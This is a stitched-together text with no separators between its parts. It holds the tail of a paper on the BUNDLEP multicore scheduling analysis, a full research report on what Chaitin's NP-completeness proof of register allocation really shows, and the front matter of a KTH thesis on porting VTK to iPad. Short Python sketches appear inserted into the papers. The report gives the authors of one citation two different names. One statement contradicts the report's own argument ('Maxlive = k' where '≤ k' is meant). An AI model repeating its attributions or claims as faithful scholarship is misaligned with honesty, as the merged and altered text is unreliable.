benefit. We find merit in BUNDLEP's scheduling and analytical approach. Under the best circumstances, (100:1, 8) and \( m = 16 \), BUNDLEP provides an analytical benefit for 16 of the 18 benchmarks, and a run-time benefit for all 18. For the least favorable configuration, (100:10, 32) and \( m = 2 \), BUNDLEP provides an analytical benefit for 9 of 18, and a run-time benefit for 8 of the 18 benchmarks.
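The two metrics used above reduce to simple differences; a minimal sketch, with function names of our own choosing:

```python
def delta_omega(serial_wcet_one_thread, m, bundlep_wceto):
    """Analytical benefit: WCET of m serially scheduled threads
    minus BUNDLEP's WCETO bound. Positive means BUNDLEP wins."""
    return m * serial_wcet_one_thread - bundlep_wceto

def delta_b(serial_cycles, bundlep_cycles):
    """Run-time benefit: cycles to finish m threads serially minus
    the cycles observed under BUNDLEP's scheduler."""
    return serial_cycles - bundlep_cycles
```

With illustrative (not measured) numbers shaped like the select result, a serial bound near four million cycles against a WCETO near two million gives a large positive \( \Delta_\omega \).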
[Figures: per-benchmark plots of \( \Delta_\omega \) (WCETO benefit) and \( \Delta_B \) (run-time benefit), in cycles, versus architecture configuration \( (B\!:\!I, \ell) \) for thread counts \( m \in \{1, 2, 4, 8, 16\} \), covering the benchmarks jfdctint, lcdnum, matmult, minver, ns, nsichneu, qurt, select, simple, sqrt, statemate, and ud.]
Register Allocation: What does Chaitin's NP-completeness Proof Really Prove? Florent Bouchez, Alain Darte, and Fabrice Rastello. Research Report N° 2006-13, March 2006. HAL Id: hal-02102286, https://hal-lara.archives-ouvertes.fr/hal-02102286, submitted on 17 Apr 2019. Abstract Register allocation is one of the most studied problems in compilation. It has been considered an NP-complete problem since Chaitin, in 1981, showed that assigning temporary variables to \( k \) machine registers amounts to coloring, with \( k \) colors, the interference graph associated to the variables, and that this graph can be arbitrary, thereby proving the NP-completeness of the problem. However, this original proof does not really show where the complexity comes from. Recently, the re-discovery that interference graphs of SSA programs can be colored in polynomial time raised the question: Can we exploit SSA to perform register allocation in polynomial time, without contradicting Chaitin's NP-completeness result?
To address such a question, we revisit Chaitin's proof to better identify the interactions between spilling (load/store insertion), coalescing/splitting (moves between registers), critical edges (a property of the control-flow graph), and coloring (assignment to registers). In particular, we show when it is easy to decide if temporary variables can be assigned to \( k \) registers or if some spilling is necessary. The real complexity comes from critical edges, spilling, and coalescing, which are addressed in our other reports. Keywords: Register allocation, SSA form, chordal graph, NP-completeness, critical edge. 1 Introduction Register allocation is one of the most studied problems in compilation. Its goal is to find a way to map the temporary variables used in a program to physical memory locations (either main memory or machine registers).
Accessing a register is much faster than accessing memory, therefore one tries to use registers as much as possible. Of course, this is not always possible, so some variables must be transferred ("spilled") to and from memory. This has a cost, the cost of load and store operations, which should be avoided as much as possible. Classical approaches are based on fast graph coloring algorithms (sometimes combined with techniques dedicated to basic blocks). A widely-used algorithm is iterated register coalescing, proposed by George and Appel [12], a modified version of previous developments by Chaitin [6, 5] and Briggs et al. [3]. In these heuristics, spilling, coalescing (removing register-to-register moves), and coloring (assigning a variable to a register) are done in the same framework. Priorities among these transformations are set implicitly with cost functions. Splitting (adding register-to-register moves) can also be integrated in this framework. Such techniques are well-established and used in many optimizing compilers. However, there are at least four reasons to revisit these approaches. 1. Today's processors are now much faster than in the past, especially faster than when Chaitin developed his first heuristic (in 1981). Some algorithms not considered in the past, because they were too time-consuming, can be good candidates today. 2. For some critical applications, especially in embedded computing, industrial compilers are ready to accept longer compilation times if the final code gets improved. 3. The increasing cost of a memory access compared to a register access suggests that it is maybe better now to focus on heuristics that give more importance to spilling cost minimization, possibly at the price of additional register-to-register moves; in other words, heuristics that consider the spilling/coalescing trade-off as unbalanced. 4.
There are many pitfalls and folk theorems concerning the complexity of the register allocation problem that need to be clarified. This last point is particularly interesting to note. In 1981, Chaitin [6] showed that allocating the variables of a program to \( k \) registers amounts to coloring with \( k \) colors the corresponding interference graph (two variables interfere if they are simultaneously live). As he was able to produce a code corresponding to an arbitrary interference graph, and because graph coloring is NP-complete [11, Problem GT4], heuristics have been used for everything: spilling, coalescing, splitting, coloring, etc. Except in a few papers where authors are more careful, the previous argument (register allocation is graph coloring, therefore it is NP-complete) is one of the first sentences of any paper on register allocation. This way of presenting Chaitin's proof can make the reader (researcher or student) believe more than what this proof actually shows. In particular, it is a common belief that, when no instruction scheduling is allowed, deciding if some spilling is necessary to allocate variables to \( k \) registers is NP-complete. This is not what Chaitin proves. We will even show that this particular problem is not NP-complete except for a few particular cases (we will make clear which ones), which is maybe a folk theorem too. Actually, going from register allocation to graph coloring is just a way of modeling the problem, but it is not an equivalence. In particular, this model does not take into account the fact that a variable can be moved from one register to another (splitting), of course at some cost, but only the cost of a move instruction (which is often better than a spill). Until very recently, only a few authors tried to address the complexity of register allocation in more detail. Maybe the most interesting complexity results are those of Liberatore et al.
[16, 9], who analyze the reasons why optimal spilling is hard for local register allocation (i.e., register allocation for basic blocks). In brief, for basic blocks, the coloring phase is of course easy (the interference graph is an interval graph) but deciding which variable to spill and where is difficult (when stores and loads have nonzero costs). We completed this study for various models of spill cost in [2]. Today, most compilers go through an intermediate code representation, the (strict) SSA form (static single assignment) [7], which makes many code optimizations simpler. In such a code, each variable is defined textually only once and is live only along the dominance tree associated to the control-flow graph. Some so-called \( \phi \) functions are used to transfer values along the control flow not covered by the dominance tree. The consequence is that the interference graph of such a code is, again, not arbitrary: it is a chordal graph, therefore easy to color. Furthermore, it can be colored with \( k \) colors if and only if Maxlive \( \leq k \), where Maxlive is the maximal number of variables simultaneously live. What does this property imply? One can imagine decomposing the register allocation problem into two phases. The first phase (also called allocation in [16]) decides which values are spilled and where, so as to get to a code where Maxlive \( \leq k \). A second phase of coloring (called register assignment in [16]) maps variables to registers, possibly removing (i.e., coalescing) or introducing (i.e., splitting) move instructions (also called shuffle code in [17]). Considering that loads and stores are more expensive than moves, such an approach is worth exploring. This is the approach advocated by Appel and George [1] and, more recently, in [4, 2, 14]. The fact that interference graphs of strict SSA programs are chordal is well-known (if one makes the connection between graph theory and SSA form).
Indeed, a theorem of Walter (1972), Gavril (1974), and Buneman (1974) (see [13, Theorem 4.8]) shows that an interference graph is chordal if and only if it is the interference graph of a family of subtrees (here the live ranges of variables) of a tree (here the dominance tree). Furthermore, maximal cliques correspond to program points. We re-discovered this property in 2002 when teaching to students that register allocation is indeed in general NP-complete, but certainly not just because graph coloring is NP-complete. Independently, Brisk et al. [4], Pereira and Palsberg [18], and Hack et al. [14] made the same observation. A direct proof of the chordality property for strict SSA programs can be given, see for example [2, 14]. Recent work has been done on how to go out of SSA [15, 21, 20] and remove \( \phi \) functions, which are not machine code. How to avoid permutations of colors at \( \phi \) points is also addressed in [14]. These works, combined with the idea of spilling before coloring so that Maxlive \( \leq k \), have led Pereira and Palsberg [19] to wonder where the NP-completeness of Chaitin's proof (apparently) disappeared: "Can we do polynomial-time register allocation by first transforming the program to SSA form, then doing linear-time register allocation for the SSA form, and finally doing SSA elimination while maintaining the mapping from temporaries to registers?" (all this when Maxlive \( \leq k \) of course, otherwise some spilling needs to be done). They show that the answer is no, the problem is NP-complete. The NP-completeness proof of Pereira and Palsberg is interesting, but it does not completely answer the question. It shows that if we choose the splitting points a priori (in particular as \( \phi \) points), then it is NP-complete to choose the right colors. However, there is no reason to fix these particular split points.
We show in this paper that, when we can choose the split points, when we are free to add program blocks so as to remove critical edges (as is often done), and when Maxlive \( \leq k \), then it is in general easy to decide if and how we can assign variables to registers without spilling. More generally, the goal of this paper is to discuss the implications of Chaitin's proof (and what it does not imply) concerning the interactions between spilling, splitting, coalescing, critical edges, and coloring. In Section 2, we first reproduce Chaitin's proof and analyze it more carefully. The proof shows that when the control-flow graph has critical edges, which we are not allowed to remove with additional blocks, then it is NP-complete to decide whether \( k \) registers are enough, even if splitting variables is allowed. In Section 3, we address the same question as Pereira and Palsberg in [19]: we show that Chaitin's proof can easily be extended to show that, when the graph has no critical edge but the splitting points are fixed (at entry and exit of basic blocks), the problem remains NP-complete. In Section 4, we show, again with a slight variation of Chaitin's proof, that even if we can split variables wherever we want, the problem remains NP-complete, but only when there are machine instructions that can create two new variables at a time. However, in this case, it is more likely that the architecture can also perform register swaps, and then \( k \) registers are enough if and only if Maxlive \( \leq k \). Finally, we show that it is also easy to decide if \( k \) registers are enough when only one variable can be created at a given time (as in traditional assembly code representation). Therefore, this study shows that the NP-completeness of register allocation is not due to the coloring phase (as a misinterpretation of Chaitin's proof may suggest), but to the presence or absence of critical edges, and to the optimization of spilling costs and coalescing costs.
2 Direct consequences of Chaitin's proof Let us look at Chaitin's NP-completeness proof again. The proof is by reduction from graph coloring [11, Problem GT4]: Given an undirected graph \( G = (V, E) \) and an integer \( k \), can we color the graph with \( k \) colors, i.e., can we define, for each vertex \( v \in V \), a color \( c(v) \) in \( \{1, \ldots, k\} \) such that \( c(v) \neq c(u) \) for each edge \( (u, v) \in E \)? The problem is NP-complete if \( G \) is arbitrary, even for a fixed \( k \geq 3 \). For the reduction, Chaitin creates a program with \( |V|+1 \) variables, one for each vertex \( u \in V \) and an additional variable \( x \), and the following structure: - For each \((u, v) \in E\), there is a block \( B_{u,v} \) that defines \( u \), \( v \), and \( x \). - For each \( u \in V \), there is a block \( B_u \) that reads \( u \) and \( x \), and returns a new value. - Each block \( B_{u,v} \) is a direct predecessor, in the control-flow graph, of the blocks \( B_u \) and \( B_v \). - An entry block switches to all blocks \( B_{u,v} \). Figure 1 shows the program associated to a cycle of length 4, with edges \((a, b)\), \((a, c)\), \((b, d)\), and \((c, d)\). This is also the example used in [19]. **Figure 1:** The program associated to a cycle of length 4. It is clear that the interference graph associated to such a program is the graph \( G \), plus a vertex for variable \( x \) with an edge \((u, x)\) for each \( u \in V \) (thus this new vertex must use an extra color). If one interprets a register as a color, then \( G \) is \( k \)-colorable if and only if each variable can be assigned to a unique register, for a total of at most \( k + 1 \) registers. This is what Chaitin proved, nothing less, nothing more: for such programs, deciding if one can assign the variables, this way, to \( k \geq 4 \) registers is thus NP-complete.
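Chaitin's construction can be illustrated programmatically. This sketch (helper names are ours; brute-force coloring is only viable for tiny graphs) builds the interference graph of the generated program and checks \( k \)-colorability:

```python
from itertools import product

def chaitin_interference_graph(vertices, edges):
    """Interference graph of Chaitin's program for G = (V, E):
    G itself, plus a vertex 'x' interfering with every v in V."""
    nodes = list(vertices) + ["x"]
    interf = {frozenset(e) for e in edges}
    interf |= {frozenset((v, "x")) for v in vertices}
    return nodes, interf

def colorable(nodes, interf, k):
    """Brute-force k-colorability check (exponential; tiny examples only)."""
    for assignment in product(range(k), repeat=len(nodes)):
        color = dict(zip(nodes, assignment))
        if all(color[u] != color[v] for u, v in (tuple(e) for e in interf)):
            return True
    return False
```

For the 4-cycle of Figure 1, \( G \) is 2-colorable (it is bipartite), so the interference graph needs exactly 3 colors: \( x \) always costs one extra register.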
Chaitin's proof, at least in its original interpretation, does not address the possibility of splitting the live range of a variable (the set of program points where the variable is live \(^1\)). Each vertex of the interference graph represents the complete live range as an atomic object; in other words, it is assumed that a variable must always reside in the same register. The fact that the register allocation problem is modeled through the interference graph loses information on the program itself and the exact location of interferences (this is a well-known fact, which led to many different heuristics). This raises the question: What if we allow live ranges to be split? Consider Figure 1 again and a particular variable, for example \( a \). In block \( B_a \), variable \( a \) is needed for the instruction 'return \( a + x \)', and this value can come from blocks \( B_{a,b} \) and \( B_{a,c} \). Therefore, even if we split the live range of \( a \) in block \( B_a \) before it is used, some register must contain the value of \( a \) both at the exit of blocks \( B_{a,b} \) and \( B_{a,c} \). The same is true for all other variables. In other words, if we consider the possible copies live at the exit of blocks of type \( B_{u,v} \) and at the entry of blocks of type \( B_v \), we get the same interference graph \( G \) for the copies. Therefore, the problem remains NP-complete even if we allow live range splitting. Splitting live ranges does not help here because, in the general case, the control-flow edges from \( B_{u,v} \) to \( B_u \) are critical edges, i.e., they go from a block with more than one successor to a block with more than one predecessor. This forces the live range of a copy to span more than one edge, leading to the well-known notion of web. All copies of a given variable \( a \) are part of the same web and must be assigned the same color.
In general, defining precisely what is colored is important, as the subtle title of Cytron and Ferrante's paper "What's in a name?" [8] pointed out. To conclude this section, we can interpret Chaitin's original proof as follows. It shows that it is NP-complete to decide if the variables of an arbitrary program can be assigned to \( k \) registers, even if live range splitting is allowed, but only when the program has critical edges that we are not allowed to remove (i.e., we cannot change the structure of the control-flow graph and add new blocks). In the following section, we consider the case of programs with no critical edges. The case of programs with some critical edges with a particular structure will be addressed in another report. 3 SSA-like programs and fixed splitting points In [19], Pereira and Palsberg pointed out that the construction of Chaitin (as done in Figure 1) is not enough to prove anything about register allocation through SSA. Indeed, to assign variables to registers for programs built as in Section 2, one just has to add extra blocks (where out-of-SSA code is traditionally inserted) and to perform some register-to-register moves in these blocks. Any such program can now be allocated with only 3 registers (see Figure 2 for a possible allocation of the program of Figure 1). Indeed, as there are no critical edges anymore, --- \(^1\) Actually, Chaitin's definition of interference is slightly different: two variables interfere only if one is live at the definition of the other. However, the two definitions coincide for programs where any control-flow path from the beginning of the program to a given use of a variable goes through a definition of this variable. Such programs are called strict. This is the case for the programs we manipulate in our NP-completeness proofs.
we can color the two variables of each basic block of type \( B_{u,v} \) independently and 'repair', when needed, the coloring to match the colors at each join, i.e., each basic block of type \( B_u \). This is done by introducing an adequate re-mapping of registers (here a single move) in the new block along the edge from \( B_{u,v} \) to \( B_u \). When there are no critical edges, one can indeed go through SSA (or any representation of live ranges as subtrees of a tree), i.e., consider that all definitions of a given variable belong to different live ranges, and color them with \( k \) colors, if possible, in linear time (because the corresponding interference graph is chordal) in a greedy fashion. At this stage, it is of course easy to decide if \( k \) registers are enough. This is possible if and only if Maxlive, the maximal number of values live at any program point, is at most \( k \). Indeed, Maxlive is obviously a lower bound for the minimal number of registers needed, as all variables live at a given point interfere (at least for strict programs). Furthermore, this lower bound can be achieved by coloring because of a double property of such live ranges: a) Maxlive is equal to the size of a maximal clique in the interference graph (in general, it is only a lower bound); b) the size of a maximal clique and the chromatic number of the graph are equal (as the graph is chordal). Furthermore, if \( k \) registers are not enough, additional splitting will not help, as splitting does not change Maxlive. If \( k \) colors are enough, it is still possible that colors do not match at join points where live ranges were split. Some 'shuffle' of registers is needed in the block along the edge where colors do not match. The fact that the edge is not critical guarantees that the shuffle will not propagate along other control-flow paths. A shuffle is a permutation of the registers.
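The greedy linear-time coloring mentioned above can be sketched for the basic-block case, where live ranges are intervals (a special case of subtrees of a tree); the function name and the range encoding below are our own:

```python
def linear_scan_color(live_ranges):
    """Greedy coloring of interval live ranges, processing definitions
    in program order and reusing freed colors. Because the interference
    graph is an interval (hence chordal) graph, the number of colors
    used equals Maxlive. live_ranges: var -> (start, end), with the
    variable live over the half-open range [start, end)."""
    order = sorted(live_ranges, key=lambda v: live_ranges[v][0])
    free, active, coloring, used = [], [], {}, 0
    for v in order:
        start, end = live_ranges[v]
        # release the colors of ranges that ended before this definition
        still_live = []
        for e, c in active:
            if e <= start:
                free.append(c)
            else:
                still_live.append((e, c))
        active = still_live
        if free:
            c = free.pop()
        else:
            c = used
            used += 1
        coloring[v] = c
        active.append((end, c))
    return coloring, used
```

On three ranges where at most two are simultaneously live, the sketch uses exactly two colors, i.e., exactly Maxlive registers.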
If some register is available at this program point, i.e., if Maxlive < $k$, then any remapping can be performed as a sequence of register-to-register moves, possibly using the free register as temporary storage. Otherwise, one additional register is needed, unless one can perform a register swap (arithmetic operations are also possible, but maybe only for integer registers). This view of coloring through the insertion of permutations is the basis of any approach that optimizes spilling first. Some spilling is done (optimally or not) so as to reduce the register pressure (Maxlive) to at most $k$. In [1], this approach is even used in its most extreme form: live ranges are split at each program point in order to address the problem of optimal spilling. After the first spilling phase, there is a potential permutation between any two program points. Then, live ranges are merged back, as much as possible, thanks to coalescing. In other words, it seems that going through SSA (for example) makes the problem of deciding if $k$ registers are enough easy. The only possible remaining case is if we do not allow any register swap. If colors do not match at a join point where Maxlive = $k$, then the permutation cannot be performed. This is the question addressed by Ferreira and Palsberg in [19]: can we easily choose an adequate coloring of the SSA representation so that no permutation (other than the identity) is needed? The answer is no: the problem is NP-complete. To show this result, Ferreira and Palsberg use a reduction from the problem of coloring circular-arc graphs [10]. Basically, the idea is to start from a circular-arc graph, to choose a particular split point of the arcs to get an interval graph, to represent this interval graph as the interference graph of some basic block, to add a back edge to form a loop, and to make sure that Maxlive = $k$ on the back edge.
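The case Maxlive < $k$ can be made concrete with a small helper (our own illustrative sketch, not code from any compiler): given the remapping required at a join and the name of a free register, it emits a sequence of plain register-to-register moves, parking one value in the free register to break each cycle.

```python
def shuffle_to_moves(mapping, free):
    """Turn a register remapping {src: dst} into register-to-register moves.

    `mapping` sends the register currently holding each live value to the
    register where the value is expected; `free` holds no live value.
    Returns a list of (src, dst) moves realizing the remapping.
    """
    moves = []
    pending = dict(mapping)
    for r in [s for s, d in pending.items() if s == d]:
        del pending[r]  # drop fixed points: value already in place
    while pending:
        # a source whose destination is not itself a pending source
        # ends a chain and can be moved out safely
        tail = next((s for s, d in pending.items() if d not in pending), None)
        if tail is not None:
            moves.append((tail, pending.pop(tail)))
        else:
            # only cycles remain: park one value in the free register
            s = next(iter(pending))
            moves.append((s, free))
            pending[free] = pending.pop(s)
    return moves
```

For a swap of two registers with a free temporary, this produces the familiar three-move sequence; a simple chain needs no temporary at all.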
In this case, coloring the basic block so that no permutation is needed on the back edge is equivalent to coloring the original circular-arc graph. Actually, this is the same proof technique used in [10] to reduce a permutation problem to the coloring of circular-arc graphs. This proof shows that if the split points are chosen a priori, then it is difficult to choose the right coloring of the SSA representation (and thus decide if k registers are enough) even for a simple loop and a single split point. However, for a fixed k, this specific problem is polynomial, as is the case for the k-coloring problem of circular-arc graphs. We now show that, with a simple variation of Chaitin’s proof, a similar result can be proved even for a fixed k, but for an arbitrary program. Consider the same program structure as Chaitin does, but after critical edges have been removed, thus a program structure such as in Figure 2. Given an arbitrary graph G = (V, E), the program has three variables u, x_u, y_u for each vertex u ∈ V and a variable x_{u,v} for each edge (u, v) ∈ E. It has the following structure:

- For each (u, v) ∈ E, there is a block B_{u,v} that defines u, v, and x_{u,v}.
- For each u ∈ V, there is a block B_u that reads u, y_u, and x_u, and returns a new value.
- For each block B_{u,v}, there is a path to the blocks B_u and B_v. Along the path from B_{u,v} to B_u, there is a block that reads v and x_{u,v} to define y_u, and then defines x_u.
- An entry block switches to all blocks B_{u,v}.

The interference graph restricted to variables u (those that correspond to vertices of G) is still exactly G. Figure 3 shows the program associated with a cycle of length 4, with edges (a, b), (a, c), (b, d), and (c, d). It has no critical edge. Assume that permutations can be placed only along the edges, or equivalently on entry or exit of the intermediate blocks that are between blocks of type $B_{u,v}$ and type $B_{u}$.
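Since the interference graph restricted to the u variables is exactly G, register questions about such programs boil down to graph coloring. On tiny instances such as the 4-cycle of Figure 3, colorability can of course be checked by brute force; the sketch below is purely illustrative (the point of the reduction is that no efficient general algorithm is expected):

```python
from itertools import product

def is_k_colorable(vertices, edges, k):
    """Exhaustively test whether the graph (vertices, edges) is k-colorable."""
    for assignment in product(range(k), repeat=len(vertices)):
        color = dict(zip(vertices, assignment))
        if all(color[u] != color[v] for u, v in edges):
            return True
    return False

# The cycle of length 4 with edges (a,b), (a,c), (b,d), (c,d) is even,
# hence 2-colorable, so the associated program fits in 3 registers.
cycle4 = (['a', 'b', 'c', 'd'],
          [('a', 'b'), ('a', 'c'), ('b', 'd'), ('c', 'd')])
```

A triangle, by contrast, needs 3 colors, and larger graphs make the exhaustive search blow up, which is exactly what the NP-completeness result predicts.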
We claim that the program can be assigned to 3 registers if and only if $G$ is 3-colorable. Indeed, it is easy to see that on each control-flow edge, exactly 3 variables are live; therefore, if only 3 registers are used, no permutation other than the identity can be performed. As a consequence, the live range of any variable $u \in V$ cannot be split, and each variable is therefore assigned a unique color. Using the same color for the corresponding vertex in $G$ gives a 3-coloring of $G$. Conversely, if $G$ is 3-colorable, assign to each variable $u$ the same color as the vertex $u$. It remains to color the variables $x_{u,v}$, $x_{u}$, and $y_{u}$. This is easy: in block $B_{u,v}$, only two colors are used so far, the color for $u$ and the color for $v$, so $x_{u,v}$ can be assigned the remaining color. Finally, assign $x_u$ a color different from that of $u$, and $y_u$ the remaining color. This gives a valid register assignment of the program.

Figure 3: The program associated with a cycle of length 4.

To get a similar proof for any fixed $k > 3$, just add $k - 3$ variables in the switch block and make their live ranges traverse all other blocks. What we just proved, with this slight variation of Chaitin’s proof, is that if split points are fixed (as is traditionally the case when going out of SSA), then it is NP-complete to decide if $k$ registers are sufficient, even for a fixed $k \geq 3$ and even if the program has no critical edge.

### 4 When split points can be anywhere

Does the study of Section 3 completely answer the question? Not quite. Indeed, who said that split points are fixed? Why can’t we shuffle registers at any program point? Consider Figure 3 again. The register pressure is 3 on any control-flow edge, but it is not 3 everywhere. In particular, between the definitions of each $y_u$ and each $x_u$, the register pressure drops to 2. At this point, some register-to-register moves could be inserted to permute two colors.
Actually, if we allow splitting wherever we want then, for such a program, 3 registers are always enough. Indeed, for each block $B_{u,v}$, color $u$, $v$, and $x_{u,v}$ with 3 different colors, arbitrarily. For each block $B_u$, do the same for $u$, $x_u$, and $y_u$. In the block between $B_{u,v}$ and $B_u$, give to $x_u$ the same color it has in $B_u$ and give to $y_u$ a color different than the color given to $u$ in $B_{u,v}$. Now, between the definitions of $y_u$ and $x_u$, only two registers contain a live value: the register that contains $u$ defined in $B_{u,v}$ and the register that contains $y_u$. These two values can be moved to the registers where they are supposed to be in $B_u$, with one move, two moves, or three moves in case of a swap, using the available register in which $x_u$ is going to be defined just after this shuffle. So, is it really NP-complete to decide if $k$ registers are enough when splitting can be done anywhere? The problem with the previous construction is that, with simple statements, there is no way to avoid leaving some program point with a low register pressure, so NP-completeness is lost. But, if we are considering the register allocation problem for an architecture with instructions that can define more than one value, it is easy to modify the proof. In the block where $y_u$ and $x_u$ are defined, use a parallel statement that uses $v$ and $x_{u,v}$ and defines $y_u$ and $x_u$ simultaneously, for example something like $(x_u, y_u) = (v + x_{u,v}, v - x_{u,v})$. Now, Maxlive = 3 everywhere in the program and, even if splitting is allowed anywhere, the program can be mapped to 3 registers if and only if $G$ is 3-colorable. Therefore, it is NP-complete to decide if $k$ registers are enough if two variables can be created simultaneously by a machine instruction, even if there is no critical edge and if we can split wherever we want.
Notice the similarity with circular-arc graphs: as noticed in [10], the problem of coloring circular-arc graphs remains NP-complete even if at most 2 circular arcs can start at any point (but not if at most 1 can start, as we show below). However, if such instructions exist, it is more likely that a register swap is also provided in the architecture, in which case we are back to the easy case where any permutation can be done and $k$ registers are enough if and only if Maxlive = $k$. It remains to consider one case: what if only one variable can be created at a given time, as in traditional sequential assembly code representation? We claim it is polynomial to decide if $k$ registers are enough, in the case of a strict program and if we are allowed to introduce blocks to remove critical edges. This can be done as follows. Consider the program after edge splitting and compute Maxlive, the maximal number of values live at any program point.\(^2\) If Maxlive < $k$, it is always possible to assign variables to $k$ registers by splitting live ranges, as we already discussed, because adequate permutations can always be performed. If Maxlive > $k$, this is not possible; more spilling has to be done. The remaining case is thus when Maxlive = $k$. If Maxlive = $k$, restrict to the control-flow graph defined by program points where exactly $k$ variables are live. We claim that, in each connected component of this graph, if $k$ registers are enough, there is a unique solution, up to a permutation of colors. Indeed, for each connected component, start from a particular program point and a particular coloring of the $k$ variables live at this point. Propagate this coloring in a greedy fashion, backwards or forwards along the control flow.

---

\(^2\)This is true for a strict program. For a non-strict program, one needs to consider another definition of Maxlive. We do not address non-strict programs in this report.
In this process, there is no ambiguity because the number of live variables remains equal to $k$: at any program point, since one variable (and only one) is created, exactly one must become dead, and the new variable must be assigned the same color as the dead one. Therefore, going backwards or forwards defines a unique solution (up to the initial permutation of colors). In other words, if there is a solution, we can define it, in each connected component, by propagation. If, during this traversal, we reach a program point already assigned and if the colors do not match, this proves that $k$ registers are not enough. Finally, if the propagation of colors on each connected component is possible, then $k$ registers are enough for the whole program. Indeed, we can color the rest in a greedy (but not unique) fashion and, when we reach a point already assigned, we can resolve a possible register mismatch because at most $k - 1$ variables are live at this point. To conclude, to decide if $k$ registers are enough, one just needs to propagate colors along the control flow. We first propagate along program points where Maxlive = $k$. If we reach a program point already colored and the colors do not match, more spilling needs to be done. Otherwise, we start a second phase of propagation, along all remaining program points. If we reach a program point already colored and the colors do not match, we resolve the problem with a permutation of at most $k - 1$ registers.

### 5 Conclusion

In this report, we tried to make clearer where the complexity of register allocation comes from. Our goal was to recall what exactly Chaitin’s original proof proves and to extend this result. The main question addressed by Chaitin is of the following type: Can we decide if $k$ registers are enough for a given program or if some spilling is necessary?
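The forward half of this propagation can be sketched for a straight-line region where exactly $k$ variables are live at every point (the data layout and names below are ours): each step kills exactly one variable and defines one, so the new variable must take the dead one's color, and meeting an already-recorded variable with a different color signals that more spilling is needed.

```python
def propagate_colors(live_sets, k):
    """Propagate colors forward through consecutive live sets of size k.

    Consecutive sets must differ by exactly one variable (one death,
    one definition).  Returns a color map, or None when a variable is
    seen again with a conflicting color (k registers are not enough).
    """
    assert all(len(s) == k for s in live_sets)
    color = {}
    for c, v in enumerate(sorted(live_sets[0])):
        color[v] = c  # arbitrary seed coloring of the first point
    for prev, cur in zip(live_sets, live_sets[1:]):
        (dead,) = prev - cur   # the unique variable that dies
        (born,) = cur - prev   # the unique variable defined here
        if born in color and color[born] != color[dead]:
            return None        # colors do not match: spill more
        color[born] = color[dead]
    return color
```

The seed coloring is arbitrary, which matches the "unique up to a permutation of colors" part of the claim.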
The original proof of Chaitin [6] proves that this problem is NP-complete if each variable can be assigned to only one register (i.e., no live range splitting). We showed that Chaitin’s construction also proves the NP-completeness of the problem if live range splitting is allowed but we are not allowed to remove critical edges (i.e., no edge splitting). Recently, Ferreira and Palsberg [19] proved that, if $k$ is arbitrary and the program is a loop, then the problem remains NP-complete if live range splitting is allowed but only in a block on the back edge and if register swaps are not available. This is a particular form of register allocation through SSA. We showed that Chaitin’s proof can be extended to show a bit more. The problem remains NP-complete for a fixed $k \geq 3$, even if the program has no critical edge and if we can split live ranges along any control-flow edge (but not inside basic blocks). Again, this holds only if register swaps are not available. These results do not address the general case where we are allowed to split wherever we want, including inside basic blocks. We showed that the problem remains NP-complete, but only if some instructions can define two variables simultaneously. For a strict program and/or if we consider that two variables interfere if and only if they are both live at some program point, we can answer the remaining cases. First, $k$ must be at least Maxlive, the maximal number of variables live at any program point. If Maxlive < $k$ or if register swaps are available (which is likely to be the case if some instructions can define two variables simultaneously), then $k$ registers are enough. If register swaps are not available and if only one variable can be defined at a given program point, then a simple polynomial-time greedy approach can be used to decide if $k$ registers are enough.
This study shows that the NP-completeness of register allocation is not due to the coloring phase (as a misinterpretation of Chaitin’s proof may suggest); deciding if $k$ registers are enough or if spilling is necessary is not as hard as one might think. The NP-completeness of register allocation is due to the presence of critical edges, and to the optimization of spilling costs (which variables should be spilled, and where, so as to reduce Maxlive with a minimal cost?) and coalescing costs (which live ranges should be fused so as to minimize register-to-register moves while keeping the graph $k$-colorable?).

References
Porting Visualization Toolkit to OpenGL ES 2.0 and iPad

SASON OHANIAN SAKI

KTH Computer Science and Communication
Master of Science Thesis, Stockholm, Sweden 2012

DD221X, Master’s Thesis in Computer Science (30 ECTS credits)
Degree Progr. in Computer Science and Engineering 270 credits
Royal Institute of Technology, year 2012
Supervisor at CSC was Lars Kjelldahl
Examiner was Olle Bälter
TRITA-CSC-E 2012:034
ISRN-KTH/CSC/E--12/034--SE
ISSN-1653-5715

Abstract

Visualization Toolkit (VTK) is an open source, cross-platform library for visualization, 3D graphics and image processing, written in C++ and OpenGL. In this report we investigate how VTK can be extended and modified to add support for the iPad. In particular, the rendering library of VTK and its library dependencies were investigated. We found that the rendering implementation of VTK makes wide use of the fixed function pipeline of OpenGL, which is unsupported in the OpenGL ES 2.0 (GLES) used on the iPad. Consideration was given to the platform-specific assumptions made by VTK and the use of unsupported code and external libraries. The conclusion is that the build system of VTK (CMake) needs revision and extension to allow the generation of a compiling XCode iOS project. Furthermore, we investigate the window handling and interaction frameworks of VTK in order to plug in and use iPad-specific windowing, views and multi-touch events.

Portning av Visualization Toolkit till OpenGL ES 2.0 och iPad

Sammanfattning (Abstract in Swedish)

# Table of Contents

1 Introduction
2 Problem Statement
3 Delimitations
4 Background
4.1 VTK
4.2 VTK Graphics Model
    vtkProp/vtkProp3D (super-class of vtkActor, vtkActor2D, vtkVolume)
    vtkLight
    vtkCamera
    vtkProperty, vtkProperty2D, vtkVolumeProperty
    vtkMapper, vtkMapper2D, vtkVolumeMapper
    vtkRenderer, vtkRenderWindow
4.3 OpenGL
4.4 OpenGL ES
4.5 CMake
    Conditional statements
    Looping constructs
    Procedure definitions
    Hello World Example
5 Building VTK
5.1 CMake
5.2 XCode
5.3 iOS - Simulator and Hardware
6 Compiling and Running VTK on iOS
6.1 System overview
6.2 vtkRendering Target Dependency Hierarchy
6.3 Modifying Targets
    vtkftgl and vtkFreetype
    vtkGraphics, vtkCommon, vtkFiltering and vtkVerdict
    vtkImaging
    vtkIO
    vtkParseOGLExt
    vtkEncodeString
    vtkRendering
7 VTK Frameworks
7.1 Rendering
    vtkRenderWindow
    vtkRenderer
    Extending VTK factories
7.2 Window and View handling
    UIWindow
    UIView
7.3 Porting OpenGL to OpenGL ES 2.0
    Shaders
7.4 Interaction
    VTK interaction framework
8 Conclusions
8.1 Why not OpenGL ES 1.1?
8.2 Future work
References

# 1 Introduction

